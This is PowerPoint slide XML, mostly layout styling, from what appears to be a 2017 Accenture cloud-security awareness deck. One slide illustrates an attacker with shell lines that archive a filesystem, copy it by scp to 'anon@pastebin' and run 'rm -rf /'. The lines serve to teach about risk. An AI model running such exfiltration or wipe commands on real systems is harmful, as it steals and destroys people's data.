              <a:buFont typeface="Graphik" panose="020B0503030202060203" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="0" indent="0">
              <a:defRPr sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="0" indent="0">
              <a:defRPr sz="1400" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg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46197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Title Master: Dark">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="000088"/>
            </a:gs>
            <a:gs pos="93000">
              <a:schemeClr val="accent1"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="18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8686800" cy="3086100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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80000"/>
              </a:lnSpc>
              <a:defRPr sz="1800" b="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400" b="1" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="1600" b="1" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1400" b="1" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1100" b="1" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mn-l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dirty="0"/>
              <a:t>First level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9052560" y="266700"/>
            <a:ext cx="2857501" cy="6438900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:defRPr sz="2800" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1400">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00">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="344479" indent="-173034">
              <a:buFont typeface="Graphik" panose="020B0503030202060203" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="0" indent="0">
              <a:defRPr sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="0" indent="0">
              <a:defRPr sz="1400" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg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62927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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017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08969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 Title and 2 Content">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dirty="0"/>
              <a:t>Copyright 2017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4101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dirty="0"/>
              <a:t>Copyright 2017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11430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29336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3"/>
            <a:ext cx="5715000" cy="1086879"/>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dirty="0"/>
              <a:t>First subtitle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second SUBTITLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017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4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381001" y="380999"/>
            <a:ext cx="5715001" cy="990601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>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94615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Titles and 2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3"/>
            <a:ext cx="5715000" cy="1086879"/>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dirty="0"/>
              <a:t>First subtitle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second SUBTITLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017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4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381001" y="380999"/>
            <a:ext cx="5715001" cy="990601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381001" y="1828802"/>
            <a:ext cx="57150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8" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6103621" y="1828804"/>
            <a:ext cx="57150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71162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dirty="0"/>
              <a:t>Copyright 2017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8592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686" r:id="rId2"/>
    <p:sldLayoutId id="2147483706" r:id="rId3"/>
  </p:sldLayoutIdLst>
  <p:hf hd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Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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0" kern="1200" cap="all" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright © 2017 Accenture. All rights reserved.</a:t>
            </a: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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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676" r:id="rId1"/>
    <p:sldLayoutId id="2147483700" r:id="rId2"/>
    <p:sldLayoutId id="2147483701" r:id="rId3"/>
    <p:sldLayoutId id="2147483680" r:id="rId4"/>
    <p:sldLayoutId id="2147483707" r:id="rId5"/>
    <p:sldLayoutId id="2147483702" r:id="rId6"/>
    <p:sldLayoutId id="2147483664" r:id="rId7"/>
    <p:sldLayoutId id="2147483670" r:id="rId8"/>
  </p:sldLayoutIdLst>
  <p:hf hd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Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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0" kern="1200" cap="none" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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52" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="5640"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6" orient="horz" pos="240" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="17" orient="horz" pos="41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676401"/>
            <a:ext cx="11430000" cy="4842607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="91440" rIns="0" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017 Accenture. All rights reserved.</a:t>
            </a:r>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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983986633"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483666" r:id="rId1"/>
    <p:sldLayoutId id="2147483671" r:id="rId2"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914377" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="70000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="6000" b="0" kern="1200" cap="all" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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0" kern="1200" cap="all" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
          <a:ea typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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n-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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2017 Accenture. All rights reserved.</a:t>
            </a:r>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 id="2147483704" r:id="rId2"/>
    <p:sldLayoutId id="2147483703" r:id="rId3"/>
  </p:sldLayoutIdLst>
  <p:hf hd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Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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0" kern="1200" cap="all" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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webappsecmovies.sourceforge.net/webgoat/"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azzlepod.com/site_media/txt/passwords.txt"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oo.gl/lzVsW7"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hyperlink" Target="https://blog.accenture.com/martin_croker/2017/03/25/tales-from-the-front-line-cloud-security/"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ttyImages-177745986.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix amt="92000"/>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1" name="Group 20"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10159341" y="399112"/>
            <a:ext cx="1664208" cy="446694"/>
            <a:chOff x="9638475" y="1219200"/>
            <a:chExt cx="1389888" cy="373063"/>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3"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 name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1052736"/>
            <a:ext cx="5315709" cy="5504688"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 872"/>
              <a:gd name="T1" fmla="*/ 0 h 903"/>
              <a:gd name="T2" fmla="*/ 0 w 872"/>
              <a:gd name="T3" fmla="*/ 197 h 903"/>
              <a:gd name="T4" fmla="*/ 629 w 872"/>
              <a:gd name="T5" fmla="*/ 451 h 903"/>
              <a:gd name="T6" fmla="*/ 0 w 872"/>
              <a:gd name="T7" fmla="*/ 706 h 903"/>
              <a:gd name="T8" fmla="*/ 0 w 872"/>
              <a:gd name="T9" fmla="*/ 903 h 903"/>
              <a:gd name="T10" fmla="*/ 872 w 872"/>
              <a:gd name="T11" fmla="*/ 550 h 903"/>
              <a:gd name="T12" fmla="*/ 872 w 872"/>
              <a:gd name="T13" fmla="*/ 353 h 903"/>
              <a:gd name="T14" fmla="*/ 0 w 872"/>
              <a:gd name="T15" fmla="*/ 0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 h="903">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629" y="451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="872" y="550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="872" y="353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="6000">
                <a:srgbClr val="8D001D"/>
              </a:gs>
              <a:gs pos="97000">
                <a:srgbClr val="FF0000"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="0"/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Graphik" panose="020B0503030202060203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8405298" y="5150890"/>
            <a:ext cx="2155198" cy="1398078"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part 101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mark Rendell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>March, 2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="4082905"/>
            <a:ext cx="11204375" cy="1218467"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="10000" dirty="0"/>
              <a:t>IN THE CLoud</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3338736"/>
            <a:ext cx="8391872" cy="534133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="5000" dirty="0"/>
              <a:t>SECURITY AND SAFETY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9697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1052736"/>
            <a:ext cx="5498976" cy="4689475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker is basically running scripts anonymously </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Just for the fun of it they delete all of your data and backups, e.g.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ tar cvf / clientname.tar</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ scp clientname.tar anon@pastebin </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"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rm -rf /</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The imbalance of damage </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright 2017 Accenture. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4F9AC08D-23A9-440E-BCB9-AA1E9877CC38}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="980729"/>
            <a:ext cx="5715000" cy="2592288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The damage to us is FAR GREATER IN SO MANY WAYS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>As per the previous page plus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Possibly more serious rework, loss of reputation (if it hits the media!), legal implications*…  ALL WITH CLIENT DATA**</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8616280" y="212715"/>
            <a:ext cx="3575720" cy="594103"/>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0" kern="1200" cap="none" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vaguely more mischievous: horror</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
